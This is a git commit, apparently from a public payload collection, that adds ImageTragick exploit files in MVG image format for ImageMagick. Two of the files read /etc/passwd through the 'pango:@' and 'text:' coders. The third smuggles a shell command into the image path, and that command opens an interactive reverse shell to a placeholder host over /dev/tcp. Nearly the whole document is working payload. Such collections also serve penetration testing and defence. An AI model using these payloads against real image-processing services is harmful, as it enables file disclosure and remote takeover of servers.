Update Image Tragick payloads

This commit is contained in:
Swissky 2017-06-28 10:33:57 +02:00 committed by ROPELEWSKI Maxime
parent 220e9cb8bd
commit 43f8367df0
10 changed files with 19 additions and 0 deletions

View File

@ -0,0 +1,5 @@
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'pango:@/etc/passwd'
pop graphic-context

View File

@ -0,0 +1,5 @@
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'text:/etc/passwd'
pop graphic-context

View File

@ -0,0 +1,9 @@
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context

View File

Before

Width:  |  Height:  |  Size: 424 B

After

Width:  |  Height:  |  Size: 424 B